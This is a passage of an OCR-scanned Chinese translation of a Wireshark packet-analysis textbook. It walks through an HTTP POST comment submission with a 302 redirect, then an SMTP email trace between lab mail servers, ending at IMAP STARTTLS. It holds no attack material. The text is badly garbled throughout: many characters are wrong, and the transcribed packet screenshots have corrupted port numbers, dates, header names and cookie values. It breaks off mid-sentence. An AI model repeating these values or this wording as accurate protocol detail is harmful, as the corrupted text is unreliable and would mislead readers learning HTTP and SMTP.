图 9-24 最 后 有 着 相应 码 200 的 HTTP 数 据 包 
和 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 一 


在 许多 情况 下 ， 当 浏览 包 列 表 时 ， 你 无 法 看 到 可 读 的 HTML 数 据 ， 因 为 这 些 数 据 被 gzip 
压缩 以 提高 这 宽 效率 ， 这 是 由 Web 服 务 器 的 HTTP 啊 应 中 的 内 容 偏 码 字段 表示 的 。 只 有 查看 
完整 的 流 时 ， 数据 才能 被 解码 并 易于 读 取 。 








HTTP 使 用 了 一 些 预 定义 的 相应 码 ， 来 表示 请 求 方法 的 结果 。 在 这 
个 例子 中 ， 我 们 看 到 个 带 有 200 响 应 但 的 数据 包 ， 表 示 一 次 成 功 的 请 
求 方法 。 这 个 数据 包 同 样 包含 一 个 时 间 惟 ， 以 及 一 些 关 于 Web 服 务 器 内 
容 编 友和 配置 参数 的 额外 信息 。 当 客户 问 接 收 到 这 个 数据 包 后 ， 这 次 处 
理 便 完成 了 。 


9.3.2 ”使 用 HTTP 传 送 数据 


我 们 看 过 了 从 Web 服 务 右 下 载 数 据 的 过 程 ， 现 在 将 注意 力 转 同上 传 
数据 。 文 作 http_post.pcap 包 售 了 一 个 非 钊 简单 的 二 传 的 例 村 : 一 个 用 户 
在 一 个 网 站 发 表 评 论 。 在 初始 的 三 次 握手 之 后 ， 客 户 病 
(172.16.16.128) 向 Web 服 务 器 (69.163.176.56) 发 送 了 一 个 HITP 数 据 

如 图 9-25 所 示 。 


这 个 数据 包 使 用 POST 方 法 ， 来 加 Web 服务 如 上 传 数据 以 供 处 理 。 


这 里 使 用 的 POST 方法 指明 了 URI /wp-comments-post.php 以 及 HTTP 1.1 请 
求 版 本 。 如 采 想 看 上 传 数据 的 内 容 ， 可 以 展开 这 个 数据 包 的 Line-based 


Text Data 部 分 。 


在 这 个 POST 的 数据 传输 完成 之 后 ， 服 务 需 会 发 送 一 个 ACK 数 据 
包 。 如 图 9-26 所 示 ， 服 务 右 在 数据 包 6 中 传输 了 一 个 啊 应 码 302〔 代 
表 “ 找 到 ”) 作为 啊 应 。 


P| Wirzshark . Packet 4 - http_post 


》 Frame 4: 1175 bytes on wire (9409 bits), 1175 bytes captured (9488 bits) 
> Ethernet II, Src: IntelCor 5b:7d:4a (680:21:6a:5b:7d:4a), Dst: D-Link 21:99:4c (88:85:5d:21:99:4c) 
> Internet Protocol Version 4, Src: 172.16.16.128, Dst: 69.163.176.56 
> Transmission Control Protocol, Src Port: 1989 (1989), Dst Port: 89 (88), Seq: 2868974211，Ack: 3746859985, Len: 1121 
Y 
"5 
> [Expert Info (Chat/Sequence): POST /wp-comments-post.php HTTP/1.1\r\n] 
Request Method: POST 壤 
Request URI; /wp-comments-post.php © 
Request Version: HTTP/1.1 
Host: www.chrissanders.org\r\n 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.7)} Gecko/29691221 Firefox/3.5.7\r\n 
Accept; text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=@.8\r\n 
Accept -Language: en-us,en;q=0.5\r\n 
Accept-Encoding: gzip,deflate\r\n 
Accept-Charset; IS0-8859-1,utf-8;q=8.7,*;q=8.7\r\n 
Keep-Alive: 388\r\n 
Connection: keep-aliveNrvn 
Referer: http://www.chrissanders.org/?p=318\r\n 
[truncated]Cookie: _ utma=84195659.588695863.1261144842.1265668786.1265682737.28; _ utmz=841956559.1264688282.12... 
Content-Type: application/x-www-form-urlencoded\r\n 
Content-Length: 179\r\n 
M\r\n 
Full request URI: http://www.chrissanders.org/wp-comments-post.ph 
[HTTP request 1/2] 
Response in frame: 6 
[Next request in frame: 7] 
Y HIML Form URL Encoded: application/x-www-form-urlencoded 和 
Y Form item: "author” = "Chris Sanders” 
Key: author 
Value; Chris Sanders 
Y Form item: "email” = "chris@chrissanders.org” 
Key: email 
Value; chris@chrissanders,.org 
Y Form item: "url"” = "http://www.chrissanders.org" 
Key: url 
value: http://www.chrissanders.org 





No.: 4 " Times .O81IO0 " Sourre: 172.18.16.128 * Destination: 69.163.176.56 " Protpeol: HTTDP * Length: 1175 ' Infe: DOST /wp-comments -post. pip HTTP/T.I (appheationk ww ww-fevm-urienoaed) 


Cas wm 








图 9-25 HTTP POST 数据 包 


Fi Wireshark . Paceet 6. http_post 


> Frame 6; 964 bytes on wire (7712 bits), 964 bytes captured (7712 bits) 
> Etnernet II, Src: D-Link 21:99:4c (68:85:5d:21:99:;4c), Dst: IntelCor Sb:7d:4a (66:21:6a:5b:7d:4a) 
> Internet Protocol Version 4, Src: 69.163.176.56, Dst: 172.16.16.128 


> Transmission Control Protocol, Src Port: 88 (88), Dst Port: 1989 (19689), Seq: 3746659985，Ack: 25808075332, Len: 919 
YY 


v 
》 [Expert Info (Chet/Sequence); HTTP/1.1 362 Found\r\n] 
Request Version: HTTP/1.1 
status Code: 302 地 
ReSpunise Phrase; Fourld 
Date: Tue, 89 Feb 2019 82:38:26 GM \r\n 
server: 上 ApacheNrNn 
X-Powered-By: PHP/4.4.9\r\n 
Expires: Wed, 11 Jan 1984 85:80:€0 GHT\r\n 
Cache-Control: no-cache, mst-revalidate, maxX-age=B\r\n 
Progmo; no-cache\r\n 
Set-Cookie: commert author 8@d7/dcE028822983c17@f35a2d747915b~ChristSanders; expires-Saturday, 22-Jan-1l 87:58:27 GMT; path-/\r\n 
set-ronkip: rommPnt_author_=mail1_pd74drR8P7AF7P9n3r170f35a70747915h=rhrisjpaprhris<anders-norg;y expires=Ssaturday, 77-1an-11 97:598:77 FMT; path=/\rn 
Set-Cookie: comment euthor url 8@c7dc602682e983c170f35a2d747915b=httpX%3A%2F%2Fwww.chrissanders.org; expires=Saturday, 22-Jan-11 97:56:27 GMT; path=/\r\n 
Last-Mocified: Tue, 8@9 Feb 2818 €2:38:27 GMT\r\n 
[2 Location: http://www.chrissanders .org/?p=3168cpage=1#comment-1830802\r\n 
Vary: Accept-Encoding\r\n 
Content-Encoding: 8zip\r\n 
Content-Length; 28\r\n 
[Content length: 28] 
Keap-Mive: timeout=2, max=18@\r\n 
Connection: Keep-Alive\r\n 
Content-Type:; text/html\r\n 
\r\n 
[HTTP response 1/2] 
[Time since requcst: 1.3567278868 secconds] 
[Request in frame: 4 
[Next request in frame; 7] 
[Nsxt_rcsponse in fromc: 18 
| Content-encoded ertity body (gzip): 28 bytes -> 8 bytes 一 
No 6 ~ Tirme; 1,437827 - Source; 59.167,176.56 ~ Destination: 172,16,16.128 - Peeoook HTTP ~ Lengths 364 - Trio; HTTP/Y, 302 Fowrrd (eco fer Mealmwemed Packet? 








图 9-26 ” HTTP 响应 码 302 用 来 进行 重 定 问 


302 相 应 码 是 HTTP 志 界 的 一 个 常用 的 重 定 同 手 段 。 这 个 数据 包 的 
Location 域 指明 了 客户 闹 被 重 定 同 的 位 置 。 在 这 里 ， 这 个 地 方便 是 评论 
所 发 表 的 原始 Web 网 页 。 最 后 ， 服 务 妖 传送 一 个 状态 码 200， 并 有 昌 这 个 
页 面 的 内 容 会 在 接 下 来 的 一 些 数 据 包 中 进行 发 送 ， 从 而 完成 传输 。 


9.4 ” 何 早 邮件 传输 协议 (SMTP) 


如 果 说 Web 浏 贤 是 用 户 参 与 次 数 最 多 的 网 络 活 动 ， 那 么 收 友 邮件 有 
可 能 是 第 二 位 。 人 徐 单 邮件 传输 协议 〈SMTP ) 是 发 送 邮 件 的 标准 ， 它 税 
Microsoft Exchange 和 了 Postfix 等 平台 使 用 。 


与 HTTP 一 样 ，SMTP 由 于 实现 方式 、 与 客户 并 /服务 右 莱 容 性 相关 
的 一 系列 特性 的 不 同 ， 在 数据 包 结 构 上 存在 多 样 性 。 在 本 三 中 ， 我 们 将 


9.4.1 收发 邮件 


邮件 服务 架构 与 邮政 服务 类 似 。 发 信 方 写 了 一 封 邮件 ， 然 后 将 邮件 
投入 友信 方 的 邮箱 ; 邮 圳 员 将 邮件 取 走 ， 并 将 邮件 这 到 邮局 进行 分 撕 。 
从 这 个 邮局 出 发 ， 这 封 邮 件 将 被 投递 至 由 此 邮局 提供 服务 的 另 一 个 邮 
箱 ， 或 者 转发 至 另 一 个 负责 投递 这 封 邮 件 的 邮局 。 一 封 邮 件 在 投递 过 程 
中 ， 可 能 会 通过 多 个 邮局 ， 甚 至 是 通过 专门 用 于 特定 地 域内 邮局 间 投 递 
的 “Hub” 邮 局 。 这 个 信息 传递 流程 如 图 9-27 所 示 。 


电子 邮件 投 罗 与 以 上 过 程 非常 类 似 ， 但 是 相关 术语 有 少许 人 不同 。 对 
于 个 人 有 用户， 电子 邮箱 取代 了 物理 邮箱 ， 为 此 用 户 提 供 邮 件 的 存储 、 发 
送 和 接收 服务 。 用 户 通 过 邮件 用 户 代 理 (MUA) ， 如 Microsoft Outlook 
或 Mozilla Thunderbird， 访 问 邮 箱 。 


当 用 户 发 送 邮 件 上 时， 邮件 将 通过 MUA 发 运 公 邮件 传输 代理 
(MTA) 。MTA 通 常 指 邮件 服务 禹 ， 流 行 的 邮件 服务 占 应 用 包括 
Microsoft Exchange 和 Postfix。 如 果 邮 件 的 收 件 方 与 发 件 方 域名 相同 ， 则 


MTA 将 耻 接 太太 邮 件 至 收 件 人 人 邮箱。 如果 邮箱 被 友 类 全 其 他 域名 下 的 
邮箱 ， 则 MTA 将 通过 DNS 找 到 收 件 方 的 邮件 服务 如 地 址 ， 并 将 邮件 传 
输 人 至 该 服务 融 。 值 得 注意 的 是 ， 邮 件 服 务 右 通 第 还 包含 其 他 组 件 ， 如 邮 
件 及 壕 代理 (MDA) 和 邮件 提交 代理 MSA) ， 但 是 从 网 络 的 角度 

看 ， ee 只 关注 客 户 响 和 服务 右 的 构 从。 以 上 过 程 的 基本 概述 如 图 
9-28 所 不 。 


局 域 投递 
由 向 
发 件 人 的 家 本 地 邮局 收 件 人 的 家 
区 域 投递 
fn 全 由 
发 件 人 的 家 本 地 邮局 远程 邮局 收 件 人 的 家 
远 距 离 投递 
发 件 人 的 家 本 地 邮局 区 域 邮 件 Hub 远程 邮局 收 件 人 的 家 


图 9-27 通过 邮政 服务 发 送 邮 件 


同 域 邮 件 传 输 


user] @domain-abc.com 至 vser2@domain-abc.com 


“3 图 IMAP/POP3 CT 
ml Wi [| 


邮件 用 户 代理 (MUA) 邮件 传输 代理 [MTA) 邮件 用 户 代理 [MUA) 
[邮件 客户 端 发 件 方 ] [邮件 服务 器 : domain-abc.com] [邮件 客户 端 : 收 件 方 ] 
跨 域 邮 件 传输 


userl @domain-abc.com 至 user2@domain-xyz.com 


al wr sm unon mul 
WN EE 


邮件 用 户 代理 [MUA] 邮件 用 户 代理 {MTA] 邮件 用 户 代 理 (MTA) 邮件 用 户 代理 {MUA,) 
[邮件 客户 端 ， 发 件 方 ] [邮件 服务 器 : domain-abc.com] [邮件 服务 器 : domain-xyz.com] [邮件 客户 端 : 收 件 方 ] 


图 9-28 ”通过 SMTP 发 送 邮 件 


出 于 人 徐 化 流程 的 目的 ， 我 们 用 邮件 客户 内 表示 MUA， 邮 件 服 务 需 
表示 MTA。 


9.4.2 ”跟踪 一 封 电 子 邮 件 


对 电子 邮件 如 何 传输 有 了 基本 理解 之 后 ， 我 们 开始 租 看 这 一 过 程 中 
的 数据 包 。 首 先 从 图 9-29 所 描述 的 场景 开始 。 


SKYNET 网 络 CYBERDYNE 网 络 
ml) si A 
Wi eo 端 Postfix 邮 件 服务 器 Postfix 邮 件 服务 器 Wi We ee 
skynet.local cyberdyne.local 
lz2. 5 116221 172.16;16.231 ee 


图 9-29 跟踪 一 封 电 子 邮件 从 发 送 方 至 收 件 方 的 传输 过 程 
以 上 场景 分 为 3 个 步 又 。 


(1) 用 户 从 计算 机 (172.16.16.225) 发 送 一 封 电 子 邮件 ， 邮 件 客 
户 问 使 用 SMTP 协 议 ， 将 邮件 传输 至 本 地 邮件 服务 器 
(172.16.16.221/skynet.local 域 〉。 


(2) 本 地 邮件 服务 器 接收 邮件 ， 并 使 用 SMTP 将 其 传输 至 远程 邮件 
服务 器 〈172.16.16.231/cyberdyne.local 域 ) 。 


(3) 远程 邮件 服务 器 接收 邮件 ， 并 将 其 与 适当 的 邮箱 相关 联 。 收 
件 方 计算 机 (172.16.16.235)〉 上 的 邮件 客户 端 通过 IMAP 协 议 取 回 邮 
件 。 


第 1 步 : 客户 问 全 本 地 邮件 服务 


我 们 从 第 一 步 开始 逐步 但 看 邮件 发 这 过程， 对 应 的 数据 包 文 件 为 
mail_sender client 1.pcapng。 这 个 文件 从 用 户 在 邮件 客户 病 上 单 击 “及 
人 用 户 计 算 机 和 本 地 邮件 服务 右 在 前 3 个 数据 包 中 完成 TCP 
至 十 。 








连接 建立 后 ， 客 户 闹 使 用 SMTP 将 邮件 传输 至 邮件 服务 磊 。 分 析 数 
据 包 时 ， 你 可 以 逐个 浏览 SMTP 请 求 并 回复 数据 包 ， 在 “数据 包 详 情 ” 窗 
口中 查看 SMTP 部 分 ， 但 是 有 一 种 更 简便 的 方式 。 由 于 SMTP 是 一 种 简 
单 的 传输 协议 ， 并 且 在 这 个 例子 中 通信 过 程 为 明文 传输 ， 因 此 你 可 以 跟 
踪 TCP 流 ， 从 而 在 一 个 窗口 中 但 看 整个 传输 过 程 。 在 抓 包 文 件 中 任意 i 
择 一 个 数据 包 ， 然 后 右键 选择 “Follow > TCP Stream”。 传 输 的 TCP 流 如 
图 9-30 所 示 。 


228 mail81 ESMTP Postfix 【Ubuntu) ©@ 
EHLO [172.16.16.225] © 

258@-mail 人 1 

258-PIPELINING 

258-SIZE 19240669 


258-S5TARTTLS 

258-ENHANCEDSTATUSCODES 

258-8BITMIME 

258 DSN 

MAIL FROM:<sanders@skynet.local> SIZE=556 @ 
258 2.1.8 Ok 

RCPT T0:<sanders@cyberdyne.local> © 


354 End data with <CR><LF>.<CR><LF> @ 

To: Chris Sanders <sanders@cyberdyne. local> 

From: Chris Sanders <sanders@skynet. local> 

Subject: Help! 

Message-ID: <5682DB88.4818687@skynet. local> 

Date: Tue, 29 Dec 2615 14:14:658 -0500 

User-Agent: Mozilla/5.80 (Windows NT 18.8; WOW64; rv:38.8) Gecko/29166161 
Thunderbird/38.5.9 和 

MIME-Version: 1.9 

Content-Type: text/plain; charset=utf-8; format=flowed 
Content-Transfer-Encoding: 7bit 


I need your help. The system has become self aware. On second thought, 
why am I sending this from a system that can most certainly intercept 


让 > Oh well.... 


258 2.8.8 Ok: queued as 931C4488D5 


QUIT 
221 2.6.9 Bye © 


7 chent KiS 7 server PE 2 turms. 
Entire conversation {951 bytes) he | show data as ASCII ~ Stream 


Hdethissteam | Prnt || saveas || Cose || Hep | 























图 9-30 碍 看 从 邮件 客户 站 至 邮件 服务 历 的 TCP 沉 


在 连接 建立 后 ， 邮 件 服务 器 在 数据 包 4 向 客户 端 发 送 一 个 服务 标 
签 ， 表 明 此 服务 器 已 经 准备 好 接收 命令 。 在 本 例 中 ， 服 务 器 显示 为 运行 


在 Ubuntu Linux 系 统 上 的 Postfix 服 务 器 @。 同 时 ， 此 服务 器 支持 接收 扩 
展 SMTP (ESMTP) 命令 。ESMTP 是 SMTP 的 扩展 ， 人 允许 在 邮件 传输 中 
使 用 更 多 的 命令 。 


邮件 客户 端 在 数据 包 5 中 通过 EHLO 命 令 进 行 回复 @@。 当 邮件 服务 器 
支持 ESMTP 时 ，EHLO 作 为 “Hello”* 命 令 ， 让 服务 器 识别 发 信和 的 客户 端 主 
机 。 在 不 文 持 ESMTP 的 情况 下 ， 使 用 HELO 命 令 进 行 发 信 客 户 端 识别 。 
Sn 
列 方 陈 。 


在 数据 包 7 中 ， 服 务 需 回 复 内 容 包 括 VRFY、STARTTLS 和 SIZE 
10240000@。 这 些 内 容 表 示 此 SMTP 服 务 器 支持 的 命令 ， 用 于 告知 客户 
端 在 邮件 传输 过 程 中 可 用 的 命令 范围 。 在 发 送 邮件 之 前 ， 这 个 特征 协 丙 
过 程 会 发 生 在 每 次 SMTP 传 输 的 开始 部 分 。 邮 件 传 输 从 数据 包 8 开 始 ， 这 
个 抓 包 文 件 剩余 的 大 部 分 内 容 均 为 邮件 传输 过 程 的 数据 包 。 


SMTP 由 客户 闯 肥 大 的 简单 命令 和 参数 值 控制 ， 服 务 硕 会 回复 相应 
的 啊 应 码 。 这 种 设计 是 为 了 协议 简化 ， 与 HITP 和 TELNET 很 相似 。 数 
扼 包 8 和 数据 包 9 是 一 组 示例 请 求 / 回 复 ， 和 客户 中 上 友 达 了 了 MAIL 命令 ， 参 数 
为 FROM:<sanders@ skynet.local> SIZE=556 人 他， 服务 器 回复 的 啊 应 码 为 
250《〈 请 求 的 邮件 操作 完成 ) ， 参 数 为 2.1.0 Ok。 在 这 次 请 求 中 ， 客 户 疹 
发 运 了 发 信 方 的 邮箱 地 址 和 邮件 大 小 ， 服 务 颖 啊 应 说 明 数 据 已 经 被 接 
路， 并且 格式 正确 。 类 似 的 传输 过 程 也 发 生 在 数据 包 10 和 数据 包 11; 客 
户 病 发 送 RCPT 命 令 ， 参 数 为 TO:<sanders@cyberdyne. local>@@， 服 务 器 
响应 为 250 2.1.5 Ok。 


剩余 的 部 分 是 传输 邮件 内 容 数 据 。 如 数据 包 12 所 示 ， 客 户 端 使 用 
DATA 命 令 局 动 邮 件 内 容 传 输 过 程 。 服 务 器 响应 码 为 354， 并 附带 信息 
@@， 其 中 ， 啊 应 码 354 表 示 服 务 需 为 这 封 邮 件 创建 了 绥 冲 区 ， 客 户 问 可 
以 开始 邮件 传输 ; 附带 信息 表示 客户 闫 需要 及 送 一 个 <CR><LE>.<CR> 
<LF> 用 于 标记 传输 终止 。 这 封 邮 件 使 用 明文 传输 ， 并 且 啊 应 人 码 表 示 传 
输 成 功 。 你 会 注意 到 ， 邮 件 文 本 中 包含 一 些 附加 信息 ， 包 括 日 期 、 内 容 
类 型 和 编码 ， 以 及 传输 使 用 的 用 户 代 理 。 以 上 信息 表明 ， 发 信用 户 使 用 
Mozilla Thunderbird 发 送 了 这 封 邮 件 @. 


传输 完成 后 ， 在 数据 包 18 中 ， 邮 件 客 户 端 使 用 不 带 参数 的 QUIT 命 
令 ， 终 止 了 SMTP 连 接 。 在 数据 包 19 中 ， 服 务 器 回复 响应 码 221〈 去 
domain 之 传输 通道 关闭 ) ， 附 带 参 数 为 2.0.0 Bye 候 。TCP 连 接 在 数据 包 


20 一 23 中 正常 关闭 。 
第 2 步 : 本 地 服务 器 至 远程 服务 器 


接 下 来 ， 我 们 将 从 skynet.local 中 的 本 地 邮件 服务 器 《地 址 为 
172.16.16.221) 的 角度 ， 考 虑 这 个 邮件 传输 场景 。 用 于 分 析 的 数据 包 存 
储 在 mailsender_server 2.pcapng 文 件 中 ， 这 些 数据 包 可 以 直接 在 邮件 服 
务 郁 上 抓 取 。 由 于 邮件 从 客户 问 至 本 地 邮件 服务 亏 的 传输 过 程 ， 也 被 邮 
件 服务 右上 的 抓 包 工具 记录 ， 因 此 你 会 友 现 ， 
mail2_sender_server_2.pcapng 包 侣 的 前 20 多 个 数据 包 与 第 1 步 中 的 数据 包 
人 


如 果 邮 件 目 的 地 是 skynet.local 域 中 的 其 他 邮箱 ， 那 么 我 们 不 会 发 现 
其 他 的 SMTP 传 输 ; 我 们 将 看 到 茶 个 邮件 客户 问 使 用 POP3 或 IMAP 协 议 
收取 邮件 。 然 而 ， 由 于 这 封 邮 件 被 发 送 至 cyberdyne.local 域 ， 因 此 本 地 
SMTP 服 务 器 必须 将 邮件 传输 至 为 cyberdyne.local 提 供 服 务 的 远程 邮件 服 
务 器 。 在 数据 包 22 中 ， 本 地 邮件 服务 硕 172.16.16.221 和 远程 邮件 服务 规 
172.16.16.231 开 始 进行 TCP 握 手 ， 并 开始 第 2 步 传输 过 程 。 


| 六 总 有 


在 现实 场景 中 ， 邮 件 服务 占 通 过 一 种 特殊 的 DNS 记 录 类 型 一 一 邮件 交换 (MX) 记录， 
定位 其 他 的 邮件 服务 姻 。 由 于 本 市 的 场景 为 实验 室 坏 境 ， 远 程 邮件 服务 占 的 IP 地 址 已 经 预 配 
置 在 本 地 邮件 服务 硕 上 ， 因 此 我 们 将 不 会 看 到 DNS 通信 过 程 。 在 进行 邮件 及 送 故 障 检查 时 ， 
需要 考 夸 DNS 问题 及 与 邮件 相关 的 特定 协议 的 问题 。 





连接 建立 完成 后 ， 我 们 在 数据 包 列 表 中 看 到 ， 邮 件 传 输 至 远程 服务 
名 有 的 过 程 使 用 SMTP 协 议 。 跟 踪 传 输 过 程 的 TCP 尝 ， 能 够 更 清晰 地 查看 
这 个 会 话 过 程 ， 如 图 9-31 所 示 。 如 果 需 要 将 这 个 连接 单独 提取 出 来 ， 请 
在 过 滤器 中 使 用 tcp.stream==1 作 为 科 选 条 件 。 


| Wireshark . Follow TCP Stream (tcp,stream eq 1) .mall_sender_server_ 


228 mail82 ESMTP Postfix 【Ubuntu) @ 


EHLO mail81 ©@ 
25@-mail82 
258-PIPELINING 
2580-SIZE 16240080 


25 台 -ETRN 
258-STARTTLS 


25@-ENHANCEDSTATUSCODES 


258-8BITMIME 
258 DSN 


MAIL FROM:<sanders@skynet.local> SIZE=732 
RCPT TO:<sanders@cyberdyne.local> ORCPT=rfc822;sanders@cyberdyne.local 


DATA 
258 2.1.8 Ok 
258 2.1.5 Ok 


354 End data with <CR><LF>.<CR><LF> 
Received: rom [172.16.16.225] (unknown [172.16.16.225]) 
by mail81 (Postfix) with ESMTP id 931C4488D5 
for <sanders@cyberdyne.local>; Tue, 29 Dec 28]15 14:13:51 -9508 (EST) 
To: Chris Sanders <sandersf@cyberdyne.local> 
From: Chris Sanders <sandersf@skynet.local> 


subject: Help! 


Message-ID: <5682DB88.460168687@skynet.local> 
Date: Tue, 29 Dec 28]5 14:14:88 -89825808 
User-Agent: Mozilla/5.8 (Windows NT 18.8; WOW64; rv:38.8) Gecko/26168181 


Thunderbird/38.5.8 


MIME-Version: 1.8 


Content-Type: text/plain; charset=utf-8; format=flowed 
Content-Transfer-Encoding: 7bit 


I need your help. The system has become self aware. On second thought, @ 
why am I sending this from a system that can most certainly intercept 


让 ?》 Oh well.... 


QUIT 


258 2.8.8 Ok: queued as 994C8617DF 


221 2.9.9 Bye 


3 chernt pkitsl 4 server KE 6 turns. 


Entire conversation (1155 bytes) 下 Show data as ASCI 国 








Hide this stream Print Save as..， | Close Help 


图 9-31 得 看 从 本 地 邮件 服务 需 全 远程 邮件 服务 硕 的 TCP 流 


这 个 传输 过 程 与 图 9-30 中 的 过 程 基 本 一 至。 本 质 上 ， 两 者 传输 的 邮 


件 内 容 一 怪 ， 区 列 在 于 ， 


步骤 2 中 的 传输 过 程 肥 生 在 两 个 服务 吉之 间 ， 


步骤 1 中 的 过 程 及 生 在 客户 痪 和 服务 硕 之 间 。 远 程 服 务 器 入 标 记 为 
mail02Q@， 本 地 服务 器 被 标记 为 mail01 信 ， 两 个 服务 器 共享 了 一 系列 可 
用 命令 全; 邮件 内 容 @ 包 括 步 又 1 中 完整 的 邮件 文本 ， 以 及 附加 在 To: 
Chris Sanders <sander@cyberdyne. local> 行 之 前 的 部 分 。 这 个 通信 过 程 
在 数据 包 27 一 35 中 ， 以 一 个 TCP 断 开 作 为 结束 。 


从 根本 上 说 ， 服 务 硕 不 关注 邮件 是 来 目 于 邮件 客户 痛 还 是 万 一 个 


SMTP 服 务 器 ， 所 以 客户 端 





服务 带 邮 件 传输 中 所 有 的 规则 和 过 程 在 


服务 占 一 一 服务 冀 邮 件 传输 过 程 中 也 都 适用 〈 任 童 形式 有 的 访问 控制 策略 
除外 ) 。 在 实际 情况 中 ， 本 地 邮件 服务 上 问 和 远程 邮件 服务 问 可 能 并 不 具 
备 相 同 的 特征 参数 集合 (包括 命令 集 和 参数 集 ) ， 或 是 基于 完全 个 同 的 


平台。 这 也 是 SMTP 要 进行 初始 化 通信 的 非常 重要 的 原因 ;这 一 过 程 确 

你 了 在 邮件 传输 之 前 ， 收 件 服务 融 将 目 身 文 持 的 命令 和 参数 集 及 送 给 友 
件 方 ， 从 而 完成 传输 使 用 命令 的 协商 。 在 SMTP 各 户 闪 或 服务 卉 明确 了 

收 件 服务 器 的 特征 参数 后 ， 能 够 保证 发 件 方 发 送 的 SMTP 命 令 和 被 收 件 服 

务 器 识别 ， 并 且 邮 件 被 正常 传输 。 这 一 机 制 使 SMTP 能 够 在 大 量 不 同 的 

客户 只 和 服务 器 之 间 应 用 ， 同 时 ， 也 让 我 们 在 发 送 邮 件 时 ， 不 需要 了 解 
收 件 方 的 网 络 设备 信 息 。 


第 3 步 : 远程 服务 右 人 至 远程 各 尸 闹 


现在 ， 我 们 的 邮件 到 达 了 远程 邮件 服务 器， 此 服务 堪 负 责 将 邮件 投 
递 人 至 cyberdyne.local 中 的 邮箱 。 我 们 将 答 看 在 远程 邮件 服务 左上 抓 取 的 
数据 包 mail_receiver_server_3.pcapng， 如 图 9-32 所 示 。 


我 们 再 识 友 现 前 15 个 数据 包 很 熟悉 ， 因 为 传输 的 邮件 内 容 与 前 两 个 
步骤 相同 ， 不 同 的 是 ， 源 地 址 变 为 本 地 邮件 服务 硕 忽 ， 目 的 地 址 变 为 远 
程 邮件 服务 冀 信 。 这 个 流程 完成 后 ，SMTP 服 务 将 邮件 和 指定 的 邮箱 进 
行 天 联 ， 之 后 ， 预 期 的 收 件 方 可 以 通过 邮件 客户 器 收取 邮件 。 


正如 之 前 提 到 的 ，SMTP 主 要 被 用 来 发送 邮件 ;和 鹤 至 目前 ，SMTP 
也 是 友 送 邮件 时 和 常用 的 协议 。 从 服务 器 上 的 邮箱 收取 邮件 的 方式 更 加 多 
样 ， 同 时 ， 由 于 在 收取 邮件 事件 中 不 断 有 新 的 需求 ， 因 此 出 现 了 数 种 用 
于 完成 邮件 收取 任务 的 协议 。 其 中 ， 比 较 流 行 的 是 邮局 协议 
v3 (POP3) 和 Internet 邮 件 访问 协议 (IMAP)〉。 在 本 例 中 ， 远 程 客户 端 
使 用 IMAP 从 邮件 服务 器 收取 邮件 ， 对 应 通信 发 生 在 数据 包 16 一 34 中 。 


| Wireshark - Follow TCP Stream (tcp,stream eq 0) + mall_recever_server 3 


228 mail@2 ESMTP Postfix (Ubuntu) 各 

EHLO mail81 他 

258-mail82 

258-PIPELINING 

258-SIZE 10240068 

258-VRFY 

258-ETRN 

258-STARTTLS 

258-ENHANCEDSTATUSCODES 

250-8BITMIME 

25@ DSN 

MAIL FROM:<sandersg@skynet .local> SIZE=732 

RCPT TO:<sanders@cyberdyne.l1ocal> ORCPT=rfc822;sanders@cyberdyne.local 

DATA 

259 2.1.9 Ok 

259 2.1.5 Ok 

354 End data with <CR><LF»>.<CR><LF> 

Received: from [172.16.16.225] (unknown [172.16.16.225]) 
by mail8] (Postfix) with ESMTP id 931C4488D5 
for <sanders@cyberdyne.1local>; Tue, 29 Dec 2015 14:;13:;51 -85688 

(EST) 

To: Chris Sanders <sanders@cyberdyne.local> 

From: Chris Sanders <*sanders@skynet.1local> 

subject: Help! 

Message-ID: <5682DB88.48186867@skynet.]local> 

Date: Tue, 29 Dec 2615 14:14:038 -85808 

User-Agent: Mozilla/5.8 (Windows NT 18.8; WOW64; rv:38.8) Gecko/28188181 

Thunderbird/38.5.8 

MIME-Version: 1.8 

Content-Type: text/plain; charset=utf-8; format=flowed 

Content-Transfer-Encoding: 7bit 


I need your help. The system has become self aware. On second thought, 
why am I sending this from a system that can most certainly intercept 
LIE On well.s. 


QUIT 
258 2.8.8 Ok: queued as 994C8617DF 
221 2.8-.8 Bye 


了 client phitls} 4 server PIG 6 tirms. 


Entire conversation (1155 bytes) show gata as stream 
me 
Hide this stream Print | Save as... | Close Help 3| 











图 9-32 ”查看 从 本 地 邮件 服务 器 至 远程 邮件 服务 右 的 TCP 流 


本 书 并 不 会 洱 新 IMAP 的 内 容 ; 在 本 例 中 ， 即 使 我 们 介绍 了 IMAP， 
也 并 不 会 对 数据 包 分 析 带 来 多 大 帮助 一 一 这 个 通信 过 程 是 加 密 的 。 碍 看 
数据 包 21@， 你 会 发 现 客户 端 (172.16.16.235) 向 邮件 服务 器 
(172.16.16.231) 发 送 了 STARTTLS 命 令 ， 如 图 9-33 所 示 。 


[ 同 | tcp,stream eq 1 
SoUree Destination Protocol Length Info 


-748353 .16.16. -16.16. 66 51147 3 143 [ACK] Seq=1 Ack=1 Win=65536 Len=@ 

:755638 :16.16. :16.16. 178 Response: * OK [CAPABILITY IMAP4revI LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE.. 
"819470 "16.16,. "16.16, 66 51147 3 143 [ACK] Seq=1 Ack=125 Win=65536 Len=@ 

871697 "16.16, 16.16, 66 Request; 1 STARTTL5 @O 


.871722 "16.16., -16.16, 54 143 > S1147 [ACK] Seq=125 Ack=13 Win=29312 Len=9 
-871964 -16.16. -16.16. 87 Response: 1 OK Begin TLS negotiation now- 
-890004 -16.16. -16.16. : 219 Client Hello 


.892786 .16.16. .16.16. 1447 Server Hello, Certificate, Server Key Exchange, Server Hello Done 
.910176 .16.16. :16.16. 212 Client Key Exchange, Change Cipher Spec, Hello Request, Hello Request 人 O 
.911283 .16.16. :16.16, 3 296 INew Session Ticket, Change Cipher Spec, Encrypted Handshake Message 
.937139 .16.16. -16.16, g 97 Application Data 

-937295 L016 -16.16, : 238 Application pata © 








图 9-33 ”STARTTLS 命 令 表 明 此 次 IMAP 通 信 将 被 加 密 


这 个 命令 各 知 服务 禹 ， 客 尸 蜗 将 使 用 TLS 加 密 收 取 邮 件 的 过 程 。 双 


方 在 数据 包 24 一 27 中 从 建 这 了 安全 信道 ， 在 余下 的 数据 包 中 候 ， 邮 件 收 
